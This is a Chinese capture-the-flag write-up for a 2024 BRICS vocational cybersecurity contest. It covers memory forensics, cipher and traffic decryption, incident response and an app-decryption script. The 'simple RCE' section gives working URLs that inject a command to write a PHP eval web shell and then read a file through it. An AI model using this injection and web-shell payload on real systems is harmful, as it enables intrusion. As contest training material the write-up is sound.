2024金砖职业技能竞赛网络安全赛项(北部)-实践赛部分wp
FrEdoM 发表于 山东 CTF 1279浏览 · 2024-07-09 12:37

2024金砖职业技能竞赛网络安全赛项(北部)-实践赛部分wp

raw1


dump下来进程

然后改后缀.data放到GIMP中

raw2

mimikatz

raw3

壁纸文件路径


提示用了Atbash

Atbash Cipher - Backwards/Reverse Alphabet - Online Decoder/Translator (dcode.fr)
zag12edtqs56t7gh5e4w2jhc

UDP


hex解密一下


HANDSHAKE
AES-EBC FF

过滤UDP协议后,在第7个数据包和第31个数据包中可以提取出hex数据。

对于这两个包的数据我们对比之后发现,他们的前32个字节是相同的,猜测前面的是某种信息(key)所以删去前面的32个字节的剩下的就行密文

第7个数据包中前32个字符ada796133d9a31fa60df7a80fd81eaf6异或FF之后的结果是525869ecc265ce059f20857f027e1509,猜测这个大概率是Key。

发现解密成功,是一个测试的flag

然后解密第31个包,发下是一个ole2文档,用oletools提取

pip3 install oletools
olevba download.ole2

得到
6c666b6d713f333f323c383a6b6c6f3e693f3c6f683b396f326c6e683f6f3b3a6e3e6c3d3977


异或爆破得到flag

应急1

应急2

把web目录下载下来

应急3

密码,通过rockeyou.txt作为压缩包的字典进行爆破,


得到密码
查看日志


yum install工具

得到爆破工具和扫描工具


由图片知道了ip

用过下面的设置密码很明显是后门用户

Linux

分析日志 查看响应IP
挨个提交
最终成功
flag{100101201131}

简单rce

直接写码执行就行

http://124.133.253.42:33107/?ip=%3Becho+%22%3C%3Fphp+eval%28%5C%24_GET%5B1%5D%29%3B%3F%3E%22%3E+get.php#

http://124.133.253.42:33107/get.php?1=system(%22cat%20/flag%22);

http://124.133.253.42:33107/get.php?1=system(%22cat%20/flag%22);

EZAPP

提取数据写脚本直接解密

encrypted_bytes = [12, 18, 15, 13, 41, 97, 15, 12, 102, 91, 12, 91, 10, 92, 94, 97, 96, 103, 97, 92, 95, 94, 15, 103, 12, 17, 15, 90, 102, 95, 97, 90, 97, 103, 16, 90, 90, 35]

def decrypt(encrypted_bytes):
    decrypted_bytes = [(b - 10) ^ 100 for b in encrypted_bytes]
    return bytes(decrypted_bytes).decode('utf-8')

flag = decrypt(encrypted_bytes)

flag{3af85f5d603293610a9fca4813439b44}

0 条评论
某人
表情
可输入 255